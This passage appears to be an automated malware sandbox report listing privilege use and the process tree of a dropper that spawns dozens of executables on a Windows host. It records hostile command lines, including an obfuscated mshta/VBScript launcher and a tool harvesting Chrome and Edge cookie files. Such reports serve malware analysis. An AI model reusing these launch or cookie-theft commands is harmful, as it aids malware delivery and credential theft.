| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\4160488.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C50.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\MaskVPN\patchs\{F7272CFD-2FF2-4971-9BBA-D45F35549C00}\MaskVPNUpdate.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\MaskVPN\MaskVPN.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\MaskVPN\MaskVPN.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Setup (6).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (6).exe"
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv JpBiMc005kCl+++s0Rv5PA.0.2
C:\Users\Admin\Documents\5g155f05UWRmP1NMH4W4qYQE.exe
"C:\Users\Admin\Documents\5g155f05UWRmP1NMH4W4qYQE.exe"
C:\Users\Admin\Documents\hMOkZHYImoDvLaSAXvcVWIzw.exe
"C:\Users\Admin\Documents\hMOkZHYImoDvLaSAXvcVWIzw.exe"
C:\Users\Admin\Documents\I7r1FrUEwNmYSO5O6BudkuEm.exe
"C:\Users\Admin\Documents\I7r1FrUEwNmYSO5O6BudkuEm.exe"
C:\Users\Admin\Documents\9MdZHB4RT9VorACFSmxAwYl_.exe
"C:\Users\Admin\Documents\9MdZHB4RT9VorACFSmxAwYl_.exe"
C:\Users\Admin\Documents\BwJRfBfq36dSRDtBrEnJs67c.exe
"C:\Users\Admin\Documents\BwJRfBfq36dSRDtBrEnJs67c.exe"
C:\Users\Admin\Documents\D7NyfNn2ltpUP1kEt4R9InkN.exe
"C:\Users\Admin\Documents\D7NyfNn2ltpUP1kEt4R9InkN.exe"
C:\Users\Admin\Documents\Bmon58itJgs11B2KVxxKPLEk.exe
"C:\Users\Admin\Documents\Bmon58itJgs11B2KVxxKPLEk.exe"
C:\Users\Admin\Documents\UGzUTsbixNOhMPqGeJbYYKkc.exe
"C:\Users\Admin\Documents\UGzUTsbixNOhMPqGeJbYYKkc.exe"
C:\Users\Admin\Documents\KPILVtzG__MhYfUlByzuGiAu.exe
"C:\Users\Admin\Documents\KPILVtzG__MhYfUlByzuGiAu.exe"
C:\Users\Admin\Documents\dKoMKenWr0odB6tjTFVUEYzN.exe
"C:\Users\Admin\Documents\dKoMKenWr0odB6tjTFVUEYzN.exe"
C:\Users\Admin\Documents\FZGPWOKivnlOwPBp3qi1ZH5_.exe
"C:\Users\Admin\Documents\FZGPWOKivnlOwPBp3qi1ZH5_.exe"
C:\Users\Admin\Documents\cOczhFVnOyKSRsPELdcpkTie.exe
"C:\Users\Admin\Documents\cOczhFVnOyKSRsPELdcpkTie.exe"
C:\Users\Admin\Documents\VqyObf4LcT48rEiucdt88i1S.exe
"C:\Users\Admin\Documents\VqyObf4LcT48rEiucdt88i1S.exe"
C:\Users\Admin\Documents\wMbMMutmbc3wkE_UihdUddVP.exe
"C:\Users\Admin\Documents\wMbMMutmbc3wkE_UihdUddVP.exe"
C:\Users\Admin\Documents\PpQsW20a0P92HEBP_c6swrBX.exe
"C:\Users\Admin\Documents\PpQsW20a0P92HEBP_c6swrBX.exe"
C:\Users\Admin\Documents\SnQLiiMZM1MWNrnfXeXFjIHe.exe
"C:\Users\Admin\Documents\SnQLiiMZM1MWNrnfXeXFjIHe.exe"
C:\Users\Admin\Documents\PEeSC0G_vMaXEqMToqHM8ep_.exe
"C:\Users\Admin\Documents\PEeSC0G_vMaXEqMToqHM8ep_.exe"
C:\Users\Admin\Documents\UkdBd92nKdEVxt7NH_xJ86WB.exe
"C:\Users\Admin\Documents\UkdBd92nKdEVxt7NH_xJ86WB.exe"
C:\Users\Admin\Documents\Xirs6iF07tjQgRKa5Latew69.exe
"C:\Users\Admin\Documents\Xirs6iF07tjQgRKa5Latew69.exe"
C:\Users\Admin\Documents\DA0SNTjID05uVTiLF3fjEqmT.exe
"C:\Users\Admin\Documents\DA0SNTjID05uVTiLF3fjEqmT.exe"
C:\Users\Admin\Documents\nmfd5A2zNFAjc1TaYF9LeeAp.exe
"C:\Users\Admin\Documents\nmfd5A2zNFAjc1TaYF9LeeAp.exe"
C:\Users\Admin\Documents\yO7mDRoKTxQNVKo1cz01yuON.exe
"C:\Users\Admin\Documents\yO7mDRoKTxQNVKo1cz01yuON.exe"
C:\Users\Admin\Documents\3XmERurioHYXIlaMfjxzhaK5.exe
"C:\Users\Admin\Documents\3XmERurioHYXIlaMfjxzhaK5.exe"
C:\Users\Admin\Documents\0L5QBYtSeFhpAWHjSvyEKKsB.exe
"C:\Users\Admin\Documents\0L5QBYtSeFhpAWHjSvyEKKsB.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Users\Admin\Documents\CkJ9CdreuYi6HGiUXWQeJZ3R.exe
"C:\Users\Admin\Documents\CkJ9CdreuYi6HGiUXWQeJZ3R.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\UGzUTsbixNOhMPqGeJbYYKkc.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\UGzUTsbixNOhMPqGeJbYYKkc.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Users\Admin\Documents\6ZxSebdQVdQkYVBi5haJVHHK.exe
"C:\Users\Admin\Documents\6ZxSebdQVdQkYVBi5haJVHHK.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2500 -ip 2500
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2500 -s 316
C:\Users\Admin\AppData\Local\Temp\is-EOUKU.tmp\6ZxSebdQVdQkYVBi5haJVHHK.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EOUKU.tmp\6ZxSebdQVdQkYVBi5haJVHHK.tmp" /SL5="$202F8,138429,56832,C:\Users\Admin\Documents\6ZxSebdQVdQkYVBi5haJVHHK.exe"
C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
C:\Users\Admin\Documents\wMbMMutmbc3wkE_UihdUddVP.exe
C:\Users\Admin\Documents\wMbMMutmbc3wkE_UihdUddVP.exe
C:\Users\Admin\Documents\9MdZHB4RT9VorACFSmxAwYl_.exe
C:\Users\Admin\Documents\9MdZHB4RT9VorACFSmxAwYl_.exe
C:\Users\Admin\Documents\BwJRfBfq36dSRDtBrEnJs67c.exe
C:\Users\Admin\Documents\BwJRfBfq36dSRDtBrEnJs67c.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\UGzUTsbixNOhMPqGeJbYYKkc.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\UGzUTsbixNOhMPqGeJbYYKkc.exe" ) do taskkill -f -iM "%~NxA"
C:\Users\Admin\Documents\Xirs6iF07tjQgRKa5Latew69.exe
"C:\Users\Admin\Documents\Xirs6iF07tjQgRKa5Latew69.exe" -q
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\Documents\D7NyfNn2ltpUP1kEt4R9InkN.exe
"C:\Users\Admin\Documents\D7NyfNn2ltpUP1kEt4R9InkN.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4552 -ip 4552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4544 -ip 4544
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 4592 -ip 4592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 3004 -ip 3004
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4544 -s 316
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 1364 -ip 1364
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "UGzUTsbixNOhMPqGeJbYYKkc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 2332 -ip 2332
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 292
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Users\Admin\AppData\Roaming\6202460.exe
"C:\Users\Admin\AppData\Roaming\6202460.exe"
C:\Users\Admin\AppData\Roaming\2354821.exe
"C:\Users\Admin\AppData\Roaming\2354821.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3004 -s 320
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 1584 -ip 1584
C:\Users\Admin\AppData\Roaming\4160488.exe
"C:\Users\Admin\AppData\Roaming\4160488.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 288
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " =="" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
C:\Users\Admin\AppData\Roaming\6315823.exe
"C:\Users\Admin\AppData\Roaming\6315823.exe"
C:\Users\Admin\Documents\cOczhFVnOyKSRsPELdcpkTie.exe
"C:\Users\Admin\Documents\cOczhFVnOyKSRsPELdcpkTie.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2556 -ip 2556
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2556 -s 280
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5464 -ip 5464
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 460
C:\Users\Admin\AppData\Local\Temp\is-RI3GK.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-RI3GK.tmp\Setup.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -Embedding
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-07BU4.tmp\Inlog.tmp
"C:\Users\Admin\AppData\Local\Temp\is-07BU4.tmp\Inlog.tmp" /SL5="$80034,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-M5KJM.tmp\WEATHER Manager.tmp
"C:\Users\Admin\AppData\Local\Temp\is-M5KJM.tmp\WEATHER Manager.tmp" /SL5="$600F0,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
C:\Users\Admin\AppData\Local\Temp\is-L67RO.tmp\MediaBurner2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-L67RO.tmp\MediaBurner2.tmp" /SL5="$802EA,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Users\Admin\AppData\Local\Temp\is-HGUIN.tmp\VPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HGUIN.tmp\VPN.tmp" /SL5="$2033A,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\is-GRJB0.tmp\3377047_logo_media.exe
"C:\Users\Admin\AppData\Local\Temp\is-GRJB0.tmp\3377047_logo_media.exe" /S /UID=burnerch2
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 6052 -ip 6052
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6052 -s 292
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 540 -p 5228 -ip 5228
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5228 -s 2192
C:\Users\Admin\AppData\Roaming\2898793.exe
"C:\Users\Admin\AppData\Roaming\2898793.exe"
C:\Users\Admin\Documents\68rM4Df0tmVh7ylRt_3_UMVw.exe
"C:\Users\Admin\Documents\68rM4Df0tmVh7ylRt_3_UMVw.exe"
C:\Users\Admin\Documents\byndKbrX3D7tT1BV1BFMtRj3.exe
"C:\Users\Admin\Documents\byndKbrX3D7tT1BV1BFMtRj3.exe"
C:\Users\Admin\AppData\Roaming\3300666.exe
"C:\Users\Admin\AppData\Roaming\3300666.exe"
C:\Users\Admin\Documents\YGcAK_perU4ud6by4adZLiI2.exe
"C:\Users\Admin\Documents\YGcAK_perU4ud6by4adZLiI2.exe"
C:\Users\Admin\Documents\RPRXYsBE_iDk29SlTGPOZ4jh.exe
"C:\Users\Admin\Documents\RPRXYsBE_iDk29SlTGPOZ4jh.exe"
C:\Users\Admin\Documents\1W66d4PrbYOtmxlxfQV7OpB0.exe
"C:\Users\Admin\Documents\1W66d4PrbYOtmxlxfQV7OpB0.exe"
C:\Users\Admin\Documents\s27w7dhtXK2yj0R0i9jmP7AH.exe
"C:\Users\Admin\Documents\s27w7dhtXK2yj0R0i9jmP7AH.exe"
C:\Users\Admin\Documents\lgJGQ8WVm0TB30ZFEEjC5Nff.exe
"C:\Users\Admin\Documents\lgJGQ8WVm0TB30ZFEEjC5Nff.exe"
C:\Users\Admin\Documents\MErB0oiECFInvOnN0pMZsfJQ.exe
"C:\Users\Admin\Documents\MErB0oiECFInvOnN0pMZsfJQ.exe"
C:\Users\Admin\Documents\NUc1s3wqp1OTSn6gv7mG4x9h.exe
"C:\Users\Admin\Documents\NUc1s3wqp1OTSn6gv7mG4x9h.exe"
C:\Users\Admin\Documents\v9K30AslqXxTdhna47O_zTpt.exe
"C:\Users\Admin\Documents\v9K30AslqXxTdhna47O_zTpt.exe"
C:\Users\Admin\Documents\SfVBdIOiSO1PlUwI_omN_q1E.exe
"C:\Users\Admin\Documents\SfVBdIOiSO1PlUwI_omN_q1E.exe"
C:\Users\Admin\Documents\tdQsgapgd7CCgb2Nac7hGQFU.exe
"C:\Users\Admin\Documents\tdQsgapgd7CCgb2Nac7hGQFU.exe"
C:\Users\Admin\Documents\O6l_34ZlnyulMJJIlKNPfWmb.exe
"C:\Users\Admin\Documents\O6l_34ZlnyulMJJIlKNPfWmb.exe"
C:\Users\Admin\Documents\0NPsMhwzVCJelUh4phYi5RpH.exe
"C:\Users\Admin\Documents\0NPsMhwzVCJelUh4phYi5RpH.exe"
C:\Users\Admin\Documents\ylquALTsOTov0ohMF2vhTPvm.exe
"C:\Users\Admin\Documents\ylquALTsOTov0ohMF2vhTPvm.exe"
C:\Users\Admin\Documents\kVbN8nA6g_JvvaAlYoRMLaMH.exe
"C:\Users\Admin\Documents\kVbN8nA6g_JvvaAlYoRMLaMH.exe"
C:\Users\Admin\Documents\DcuJbapcOStMsK_sofvjH1rd.exe
"C:\Users\Admin\Documents\DcuJbapcOStMsK_sofvjH1rd.exe"
C:\Users\Admin\Documents\QHKSwlfN2a2ZEq9KKEivqPlv.exe
"C:\Users\Admin\Documents\QHKSwlfN2a2ZEq9KKEivqPlv.exe"
C:\Users\Admin\AppData\Roaming\2297678.exe
"C:\Users\Admin\AppData\Roaming\2297678.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\qj6XhKnUZ4CBbCjZlcL3OlGx.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\qj6XhKnUZ4CBbCjZlcL3OlGx.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Users\Admin\AppData\Local\Temp\tmp9F4E_tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp9F4E_tmp.exe"
C:\Users\Admin\AppData\Roaming\5673775.exe
"C:\Users\Admin\AppData\Roaming\5673775.exe"
C:\Users\Admin\Documents\qj6XhKnUZ4CBbCjZlcL3OlGx.exe
"C:\Users\Admin\Documents\qj6XhKnUZ4CBbCjZlcL3OlGx.exe"
C:\Users\Admin\Documents\4cG2xxeuRqqMERqbrJ3qz4Xy.exe
"C:\Users\Admin\Documents\4cG2xxeuRqqMERqbrJ3qz4Xy.exe"
C:\Users\Admin\Documents\Lghg4c3DhujKezb8QrcV7Pg1.exe
"C:\Users\Admin\Documents\Lghg4c3DhujKezb8QrcV7Pg1.exe"
C:\Users\Admin\Documents\J6vAkH5kawOVLHYY8QC6PvMX.exe
"C:\Users\Admin\Documents\J6vAkH5kawOVLHYY8QC6PvMX.exe"
C:\Users\Admin\Documents\YSvOpD61YkvvwSwmM3JQ9_ms.exe
"C:\Users\Admin\Documents\YSvOpD61YkvvwSwmM3JQ9_ms.exe"
C:\Users\Admin\Documents\nHdE_zfL0310gEydEjYekZwa.exe
"C:\Users\Admin\Documents\nHdE_zfL0310gEydEjYekZwa.exe"
C:\Users\Admin\Documents\AGDhhP4Kqn9gOY9xkf9z3bL1.exe
"C:\Users\Admin\Documents\AGDhhP4Kqn9gOY9xkf9z3bL1.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\qj6XhKnUZ4CBbCjZlcL3OlGx.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\qj6XhKnUZ4CBbCjZlcL3OlGx.exe" ) do taskkill -f -iM "%~NxA"
C:\Users\Admin\AppData\Roaming\3528019.exe
"C:\Users\Admin\AppData\Roaming\3528019.exe"
C:\Users\Admin\AppData\Local\Temp\is-A6LKA.tmp\AGDhhP4Kqn9gOY9xkf9z3bL1.tmp
"C:\Users\Admin\AppData\Local\Temp\is-A6LKA.tmp\AGDhhP4Kqn9gOY9xkf9z3bL1.tmp" /SL5="$1050A,138429,56832,C:\Users\Admin\Documents\AGDhhP4Kqn9gOY9xkf9z3bL1.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 6256 -ip 6256
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5704 -ip 5704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5704 -s 2420
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6256 -s 320
C:\Users\Admin\AppData\Local\Temp\is-9L90V.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-9L90V.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "qj6XhKnUZ4CBbCjZlcL3OlGx.exe"
C:\Users\Admin\Documents\1W66d4PrbYOtmxlxfQV7OpB0.exe
C:\Users\Admin\Documents\1W66d4PrbYOtmxlxfQV7OpB0.exe
C:\Users\Admin\Documents\ylquALTsOTov0ohMF2vhTPvm.exe
C:\Users\Admin\Documents\ylquALTsOTov0ohMF2vhTPvm.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 1720 -ip 1720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 1864
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 6200 -ip 6200
C:\Users\Admin\Documents\DcuJbapcOStMsK_sofvjH1rd.exe
"C:\Users\Admin\Documents\DcuJbapcOStMsK_sofvjH1rd.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 800 -p 6348 -ip 6348
C:\Users\Admin\AppData\Local\Temp\C50.exe
C:\Users\Admin\AppData\Local\Temp\C50.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 280
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 836 -p 6240 -ip 6240
C:\Users\Admin\Documents\QHKSwlfN2a2ZEq9KKEivqPlv.exe
"C:\Users\Admin\Documents\QHKSwlfN2a2ZEq9KKEivqPlv.exe" -q
C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\System32\dllhost.exe"
C:\Users\Admin\AppData\Local\Temp\152B.exe
C:\Users\Admin\AppData\Local\Temp\152B.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 832 -p 876 -ip 876
C:\Users\Admin\AppData\Local\Temp\is-6G441.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-6G441.tmp\Setup.exe" /Verysilent
C:\Windows\SysWOW64\WerFault.exe
